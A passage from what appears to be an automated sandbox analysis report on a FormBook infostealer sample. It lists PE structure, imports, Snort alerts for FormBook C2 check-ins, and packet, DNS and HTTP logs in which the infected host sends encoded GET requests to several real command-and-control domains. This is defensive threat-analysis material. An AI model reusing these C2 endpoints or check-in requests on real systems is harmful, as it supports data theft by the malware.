call 00007FA99CDD43E9h
call dword ptr [004070ACh]
mov ebp, 007A8000h
push eax
push ebp
call 00007FA99CDD43D7h
push ebx
call dword ptr [00407144h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x73cc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3ab000	0x9e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x280	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5c1c	0x5e00	False	0.671376329787234	data	6.457943907681547	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x115e	0x1200	False	0.4470486111111111	data	5.14377821511568	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x399878	0x600	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x3a3000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3ab000	0x9e0	0xa00	False	0.45625	data	4.51033039556576	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x3ab190	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States
RT_DIALOG	0x3ab478	0x100	data	English	United States
RT_DIALOG	0x3ab578	0x11c	data	English	United States
RT_DIALOG	0x3ab698	0x60	data	English	United States
RT_GROUP_ICON	0x3ab6f8	0x14	data	English	United States
RT_MANIFEST	0x3ab710	0x2cc	XML 1.0 document, ASCII text, with very long lines (716), with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	SetFileAttributesA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CompareFileTime, SearchPathA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, CreateDirectoryA, lstrcmpiA, GetCommandLineA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, LoadLibraryA, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, WaitForSingleObject, GetWindowsDirectoryA, GetTempPathA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, LoadLibraryExA, GetModuleHandleA, MultiByteToWideChar, FreeLibrary
USER32.dll	GetWindowRect, EnableMenuItem, GetSystemMenu, ScreenToClient, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, PostQuitMessage, RegisterClassA, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, OpenClipboard, TrackPopupMenu, SendMessageTimeoutA, GetDC, LoadImageA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, SetWindowLongA, EmptyClipboard, SetTimer, CreateDialogParamA, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll	RegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.4185.53.179.17449700802031453 11/22/22-12:51:18.466682	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49700	80	192.168.2.4	185.53.179.174
192.168.2.4185.53.179.17449700802031412 11/22/22-12:51:18.466682	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49700	80	192.168.2.4	185.53.179.174
192.168.2.4154.205.231.19549697802031449 11/22/22-12:49:50.422612	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49697	80	192.168.2.4	154.205.231.195
192.168.2.4154.205.231.19549697802031453 11/22/22-12:49:50.422612	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49697	80	192.168.2.4	154.205.231.195
192.168.2.4185.53.179.17449700802031449 11/22/22-12:51:18.466682	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49700	80	192.168.2.4	185.53.179.174
192.168.2.4154.205.231.19549697802031412 11/22/22-12:49:50.422612	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49697	80	192.168.2.4	154.205.231.195

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 22, 2022 12:49:29.156959057 CET	49696	80	192.168.2.4	82.163.176.145
Nov 22, 2022 12:49:29.201296091 CET	80	49696	82.163.176.145	192.168.2.4
Nov 22, 2022 12:49:29.201545000 CET	49696	80	192.168.2.4	82.163.176.145
Nov 22, 2022 12:49:29.208606005 CET	49696	80	192.168.2.4	82.163.176.145
Nov 22, 2022 12:49:29.253252983 CET	80	49696	82.163.176.145	192.168.2.4
Nov 22, 2022 12:49:29.264415979 CET	80	49696	82.163.176.145	192.168.2.4
Nov 22, 2022 12:49:29.264554024 CET	80	49696	82.163.176.145	192.168.2.4
Nov 22, 2022 12:49:29.264642954 CET	49696	80	192.168.2.4	82.163.176.145
Nov 22, 2022 12:49:29.264642954 CET	49696	80	192.168.2.4	82.163.176.145
Nov 22, 2022 12:49:29.309076071 CET	80	49696	82.163.176.145	192.168.2.4
Nov 22, 2022 12:49:50.249785900 CET	49697	80	192.168.2.4	154.205.231.195
Nov 22, 2022 12:49:50.422183990 CET	80	49697	154.205.231.195	192.168.2.4
Nov 22, 2022 12:49:50.422399044 CET	49697	80	192.168.2.4	154.205.231.195
Nov 22, 2022 12:49:50.422611952 CET	49697	80	192.168.2.4	154.205.231.195
Nov 22, 2022 12:49:50.637639999 CET	80	49697	154.205.231.195	192.168.2.4
Nov 22, 2022 12:49:50.925312042 CET	49697	80	192.168.2.4	154.205.231.195
Nov 22, 2022 12:49:51.153381109 CET	80	49697	154.205.231.195	192.168.2.4
Nov 22, 2022 12:49:51.268440008 CET	80	49697	154.205.231.195	192.168.2.4
Nov 22, 2022 12:49:51.268639088 CET	49697	80	192.168.2.4	154.205.231.195
Nov 22, 2022 12:50:11.451299906 CET	49698	80	192.168.2.4	199.59.243.222
Nov 22, 2022 12:50:11.470046043 CET	80	49698	199.59.243.222	192.168.2.4
Nov 22, 2022 12:50:11.470199108 CET	49698	80	192.168.2.4	199.59.243.222
Nov 22, 2022 12:50:11.470309973 CET	49698	80	192.168.2.4	199.59.243.222
Nov 22, 2022 12:50:11.488543987 CET	80	49698	199.59.243.222	192.168.2.4
Nov 22, 2022 12:50:11.670696974 CET	80	49698	199.59.243.222	192.168.2.4
Nov 22, 2022 12:50:11.670752048 CET	80	49698	199.59.243.222	192.168.2.4
Nov 22, 2022 12:50:11.670789957 CET	80	49698	199.59.243.222	192.168.2.4
Nov 22, 2022 12:50:11.670906067 CET	49698	80	192.168.2.4	199.59.243.222
Nov 22, 2022 12:50:11.670983076 CET	49698	80	192.168.2.4	199.59.243.222
Nov 22, 2022 12:50:11.684250116 CET	80	49698	199.59.243.222	192.168.2.4
Nov 22, 2022 12:50:11.684503078 CET	49698	80	192.168.2.4	199.59.243.222
Nov 22, 2022 12:50:11.689338923 CET	80	49698	199.59.243.222	192.168.2.4
Nov 22, 2022 12:50:55.114316940 CET	49699	80	192.168.2.4	188.114.97.3
Nov 22, 2022 12:50:55.130929947 CET	80	49699	188.114.97.3	192.168.2.4
Nov 22, 2022 12:50:55.131028891 CET	49699	80	192.168.2.4	188.114.97.3
Nov 22, 2022 12:50:55.131191015 CET	49699	80	192.168.2.4	188.114.97.3
Nov 22, 2022 12:50:55.147603035 CET	80	49699	188.114.97.3	192.168.2.4
Nov 22, 2022 12:50:55.282385111 CET	80	49699	188.114.97.3	192.168.2.4
Nov 22, 2022 12:50:55.328381062 CET	49699	80	192.168.2.4	188.114.97.3
Nov 22, 2022 12:50:55.500741959 CET	80	49699	188.114.97.3	192.168.2.4
Nov 22, 2022 12:50:55.500875950 CET	49699	80	192.168.2.4	188.114.97.3
Nov 22, 2022 12:50:55.764381886 CET	49699	80	192.168.2.4	188.114.97.3
Nov 22, 2022 12:50:55.781120062 CET	80	49699	188.114.97.3	192.168.2.4
Nov 22, 2022 12:51:18.434262991 CET	49700	80	192.168.2.4	185.53.179.174
Nov 22, 2022 12:51:18.450318098 CET	80	49700	185.53.179.174	192.168.2.4
Nov 22, 2022 12:51:18.450436115 CET	49700	80	192.168.2.4	185.53.179.174
Nov 22, 2022 12:51:18.466414928 CET	80	49700	185.53.179.174	192.168.2.4
Nov 22, 2022 12:51:18.466681957 CET	49700	80	192.168.2.4	185.53.179.174
Nov 22, 2022 12:51:18.482640982 CET	80	49700	185.53.179.174	192.168.2.4
Nov 22, 2022 12:51:18.482681036 CET	80	49700	185.53.179.174	192.168.2.4
Nov 22, 2022 12:51:18.482692957 CET	80	49700	185.53.179.174	192.168.2.4
Nov 22, 2022 12:51:18.482912064 CET	49700	80	192.168.2.4	185.53.179.174
Nov 22, 2022 12:51:18.483071089 CET	49700	80	192.168.2.4	185.53.179.174
Nov 22, 2022 12:51:18.498814106 CET	80	49700	185.53.179.174	192.168.2.4
Nov 22, 2022 12:51:39.447921038 CET	49701	80	192.168.2.4	188.114.97.3
Nov 22, 2022 12:51:39.465831995 CET	80	49701	188.114.97.3	192.168.2.4
Nov 22, 2022 12:51:39.465954065 CET	49701	80	192.168.2.4	188.114.97.3
Nov 22, 2022 12:51:39.466130972 CET	49701	80	192.168.2.4	188.114.97.3
Nov 22, 2022 12:51:39.482937098 CET	80	49701	188.114.97.3	192.168.2.4
Nov 22, 2022 12:51:39.590523005 CET	80	49701	188.114.97.3	192.168.2.4
Nov 22, 2022 12:51:39.590572119 CET	80	49701	188.114.97.3	192.168.2.4
Nov 22, 2022 12:51:39.590658903 CET	49701	80	192.168.2.4	188.114.97.3
Nov 22, 2022 12:51:39.590667009 CET	80	49701	188.114.97.3	192.168.2.4
Nov 22, 2022 12:51:39.590773106 CET	49701	80	192.168.2.4	188.114.97.3
Nov 22, 2022 12:51:39.590821981 CET	80	49701	188.114.97.3	192.168.2.4
Nov 22, 2022 12:51:39.590862989 CET	49701	80	192.168.2.4	188.114.97.3
Nov 22, 2022 12:51:59.942137957 CET	49702	80	192.168.2.4	45.221.114.43
Nov 22, 2022 12:52:00.152646065 CET	80	49702	45.221.114.43	192.168.2.4
Nov 22, 2022 12:52:00.152808905 CET	49702	80	192.168.2.4	45.221.114.43
Nov 22, 2022 12:52:00.152930975 CET	49702	80	192.168.2.4	45.221.114.43
Nov 22, 2022 12:52:00.363827944 CET	80	49702	45.221.114.43	192.168.2.4
Nov 22, 2022 12:52:00.363867044 CET	80	49702	45.221.114.43	192.168.2.4
Nov 22, 2022 12:52:00.364029884 CET	49702	80	192.168.2.4	45.221.114.43
Nov 22, 2022 12:52:00.364094973 CET	49702	80	192.168.2.4	45.221.114.43
Nov 22, 2022 12:52:00.575162888 CET	80	49702	45.221.114.43	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 22, 2022 12:49:29.093087912 CET	50911	53	192.168.2.4	8.8.8.8
Nov 22, 2022 12:49:29.148000002 CET	53	50911	8.8.8.8	192.168.2.4
Nov 22, 2022 12:49:49.925802946 CET	59683	53	192.168.2.4	8.8.8.8
Nov 22, 2022 12:49:50.248259068 CET	53	59683	8.8.8.8	192.168.2.4
Nov 22, 2022 12:50:11.426652908 CET	64167	53	192.168.2.4	8.8.8.8
Nov 22, 2022 12:50:11.448437929 CET	53	64167	8.8.8.8	192.168.2.4
Nov 22, 2022 12:50:31.854062080 CET	58565	53	192.168.2.4	8.8.8.8
Nov 22, 2022 12:50:31.872966051 CET	53	58565	8.8.8.8	192.168.2.4
Nov 22, 2022 12:50:54.969403982 CET	52239	53	192.168.2.4	8.8.8.8
Nov 22, 2022 12:50:55.105500937 CET	53	52239	8.8.8.8	192.168.2.4
Nov 22, 2022 12:51:18.403544903 CET	56807	53	192.168.2.4	8.8.8.8
Nov 22, 2022 12:51:18.432941914 CET	53	56807	8.8.8.8	192.168.2.4
Nov 22, 2022 12:51:39.392865896 CET	61007	53	192.168.2.4	8.8.8.8
Nov 22, 2022 12:51:39.443305016 CET	53	61007	8.8.8.8	192.168.2.4
Nov 22, 2022 12:51:59.788341045 CET	60686	53	192.168.2.4	8.8.8.8
Nov 22, 2022 12:51:59.939815044 CET	53	60686	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 22, 2022 12:49:29.093087912 CET	192.168.2.4	8.8.8.8	0x4f9c	Standard query (0)	www.hallmarktb.com	A (IP address)	IN (0x0001)	false
Nov 22, 2022 12:49:49.925802946 CET	192.168.2.4	8.8.8.8	0x42b1	Standard query (0)	www.kcrsw.com	A (IP address)	IN (0x0001)	false
Nov 22, 2022 12:50:11.426652908 CET	192.168.2.4	8.8.8.8	0x855d	Standard query (0)	www.counterpoint.online	A (IP address)	IN (0x0001)	false
Nov 22, 2022 12:50:31.854062080 CET	192.168.2.4	8.8.8.8	0xc63	Standard query (0)	www.duaidapduapjdp.site	A (IP address)	IN (0x0001)	false
Nov 22, 2022 12:50:54.969403982 CET	192.168.2.4	8.8.8.8	0x9a4	Standard query (0)	www.giaxevn.info	A (IP address)	IN (0x0001)	false
Nov 22, 2022 12:51:18.403544903 CET	192.168.2.4	8.8.8.8	0x76a	Standard query (0)	www.printrynner.com	A (IP address)	IN (0x0001)	false
Nov 22, 2022 12:51:39.392865896 CET	192.168.2.4	8.8.8.8	0x2c54	Standard query (0)	www.barmanon5.pro	A (IP address)	IN (0x0001)	false
Nov 22, 2022 12:51:59.788341045 CET	192.168.2.4	8.8.8.8	0x81d3	Standard query (0)	www.fulili.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 22, 2022 12:49:29.148000002 CET	8.8.8.8	192.168.2.4	0x4f9c	No error (0)	www.hallmarktb.com	hallmarktb.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 22, 2022 12:49:29.148000002 CET	8.8.8.8	192.168.2.4	0x4f9c	No error (0)	hallmarktb.com		82.163.176.145	A (IP address)	IN (0x0001)	false
Nov 22, 2022 12:49:50.248259068 CET	8.8.8.8	192.168.2.4	0x42b1	No error (0)	www.kcrsw.com		154.205.231.195	A (IP address)	IN (0x0001)	false
Nov 22, 2022 12:50:11.448437929 CET	8.8.8.8	192.168.2.4	0x855d	No error (0)	www.counterpoint.online		199.59.243.222	A (IP address)	IN (0x0001)	false
Nov 22, 2022 12:50:31.872966051 CET	8.8.8.8	192.168.2.4	0xc63	Name error (3)	www.duaidapduapjdp.site	none	none	A (IP address)	IN (0x0001)	false
Nov 22, 2022 12:50:55.105500937 CET	8.8.8.8	192.168.2.4	0x9a4	No error (0)	www.giaxevn.info		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 22, 2022 12:50:55.105500937 CET	8.8.8.8	192.168.2.4	0x9a4	No error (0)	www.giaxevn.info		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 22, 2022 12:51:18.432941914 CET	8.8.8.8	192.168.2.4	0x76a	No error (0)	www.printrynner.com		185.53.179.174	A (IP address)	IN (0x0001)	false
Nov 22, 2022 12:51:39.443305016 CET	8.8.8.8	192.168.2.4	0x2c54	No error (0)	www.barmanon5.pro		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 22, 2022 12:51:39.443305016 CET	8.8.8.8	192.168.2.4	0x2c54	No error (0)	www.barmanon5.pro		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 22, 2022 12:51:59.939815044 CET	8.8.8.8	192.168.2.4	0x81d3	No error (0)	www.fulili.com		45.221.114.43	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.hallmarktb.com

www.kcrsw.com

www.counterpoint.online

www.giaxevn.info

www.printrynner.com

www.barmanon5.pro

www.fulili.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49696	82.163.176.145	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2022 12:49:29.208606005 CET	92	OUT	GET /b31b/?lTkLp=M+h8aLJTzkdMB+8ZocaWOvSwSZLS4MqRUOSr6JSrGf8zrqKSVky/7qT7vfhEHF4R9/H1&s2MHE=y8UpS6w HTTP/1.1 Host: www.hallmarktb.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2022 12:49:29.264415979 CET	93	IN	HTTP/1.1 302 Found Server: nginx Date: Tue, 22 Nov 2022 11:49:29 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 377 Connection: close Location: https://www.hallmarktb.com/b31b/?lTkLp=M+h8aLJTzkdMB+8ZocaWOvSwSZLS4MqRUOSr6JSrGf8zrqKSVky/7qT7vfhEHF4R9/H1&s2MHE=y8UpS6w Cache-Control: max-age=0 Expires: Tue, 22 Nov 2022 11:49:29 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 61 6c 6c 6d 61 72 6b 74 62 2e 63 6f 6d 2f 62 33 31 62 2f 3f 6c 54 6b 4c 70 3d 4d 2b 68 38 61 4c 4a 54 7a 6b 64 4d 42 2b 38 5a 6f 63 61 57 4f 76 53 77 53 5a 4c 53 34 4d 71 52 55 4f 53 72 36 4a 53 72 47 66 38 7a 72 71 4b 53 56 6b 79 2f 37 71 54 37 76 66 68 45 48 46 34 52 39 2f 48 31 26 61 6d 70 3b 73 32 4d 48 45 3d 79 38 55 70 53 36 77 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 68 61 6c 6c 6d 61 72 6b 74 62 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.hallmarktb.com/b31b/?lTkLp=M+h8aLJTzkdMB+8ZocaWOvSwSZLS4MqRUOSr6JSrGf8zrqKSVky/7qT7vfhEHF4R9/H1&s2MHE=y8UpS6w">here</a>.</p><hr><address>Apache Server at www.hallmarktb.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49697	154.205.231.195	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2022 12:49:50.422611952 CET	94	OUT	GET /b31b/?lTkLp=US/HGfNY9YWYLPWCTBWLA6nVcrxKwQj48xB1ut/cNKd52qSqxSuIfwmOCq9IK55e/8rl&s2MHE=y8UpS6w HTTP/1.1 Host: www.kcrsw.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2022 12:49:51.268440008 CET	94	IN	HTTP/1.1 302 Found Transfer-Encoding: chunked Location: /?n=01 Server: Nginx Microsoft-HTTPAPI/2.0 X-Powered-By: Nginx Date: Tue, 22 Nov 2022 11:50:00 GMT Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49698	199.59.243.222	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2022 12:50:11.470309973 CET	95	OUT	GET /b31b/?lTkLp=UH1VMjfgpJMWU+/Gn4AwdepKZevv0RxNZvKJDaH/oG1tjT2ASbSXZlDS/qU1YicJYd9A&s2MHE=y8UpS6w HTTP/1.1 Host: www.counterpoint.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2022 12:50:11.670696974 CET	96	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 22 Nov 2022 11:50:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: parking_session=0aa95149-0408-724c-eda9-e23ba525dc5d; expires=Tue, 22-Nov-2022 12:05:11 GMT; Max-Age=900; path=/; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_T/qqLYJD0cCp8oUOFqhV8uI3CP6U3K9JpomuLlBYfhpbTEP6v5HFQgX+cggO5YI04t9Zq4xJwoPxFlAl2F+yBg== Cache-Control: no-cache Accept-CH: sec-ch-prefers-color-scheme Critical-CH: sec-ch-prefers-color-scheme Vary: sec-ch-prefers-color-scheme Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Data Raw: 35 30 34 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 54 2f 71 71 4c 59 4a 44 30 63 43 70 38 6f 55 4f 46 71 68 56 38 75 49 33 43 50 36 55 33 4b 39 4a 70 6f 6d 75 4c 6c 42 59 66 68 70 62 54 45 50 36 76 35 48 46 51 67 58 2b 63 67 67 4f 35 59 49 30 34 74 39 5a 71 34 78 4a 77 6f 50 78 46 6c 41 6c 32 46 2b 79 42 67 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 Data Ascii: 504<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_T/qqLYJD0cCp8oUOFqhV8uI3CP6U3K9JpomuLlBYfhpbTEP6v5HFQgX+cggO5YI04t9Zq4xJwoPxFlAl2F+yBg=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" hre
Nov 22, 2022 12:50:11.670752048 CET	97	IN	Data Raw: 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 61 72 6b Data Ascii: f="https://www.google.com" crossorigin><link rel="dns-prefetch" href="https://parking.bodiscdn.com" crossorigin></head><body><div id="target" style='opacity: 0'></div><script>window.park = "eyJ1dWlkIjoiMGFhOTUxNDktMDQwOC03MjRjLWVkYTktZTIzYmE1M

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49699	188.114.97.3	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2022 12:50:55.131191015 CET	98	OUT	GET /b31b/?lTkLp=t9u9o370/Gy8le3USielS0NDNQF4paptFWM7HrjD+/miGjlRMzz+Q3hrEpue/lFurnLE&s2MHE=y8UpS6w HTTP/1.1 Host: www.giaxevn.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2022 12:50:55.282385111 CET	99	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 22 Nov 2022 11:50:55 GMT Content-Length: 0 Connection: close Location: https://www.giaxevn.info/b31b/?lTkLp=t9u9o370%2FGy8le3USielS0NDNQF4paptFWM7HrjD+%2FmiGjlRMzz+Q3hrEpue%2FlFurnLE&s2MHE=y8UpS6w CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B8F05WicP%2FdB0Fu1%2FN6jIE1ly8pFMEDPycabj%2BlfkDHdLJennlKwy8WKRwbN7EACF1Ka5LPdaywU4cbuQ2wJlfXtmmTuO5HDjUl%2FiIXTkT9eDkzZNxv6kX72RpoM0a2Ia5kd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 76e17342997a924d-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49700	185.53.179.174	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2022 12:51:18.466681957 CET	100	OUT	GET /b31b/?lTkLp=/hsXnIl0hAYrOErJ4UuZDvWeNEd2/L3NRo6zO1KQ/oOCDpqqcfPNzkrpMSnMO3fUk1gw&s2MHE=y8UpS6w HTTP/1.1 Host: www.printrynner.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
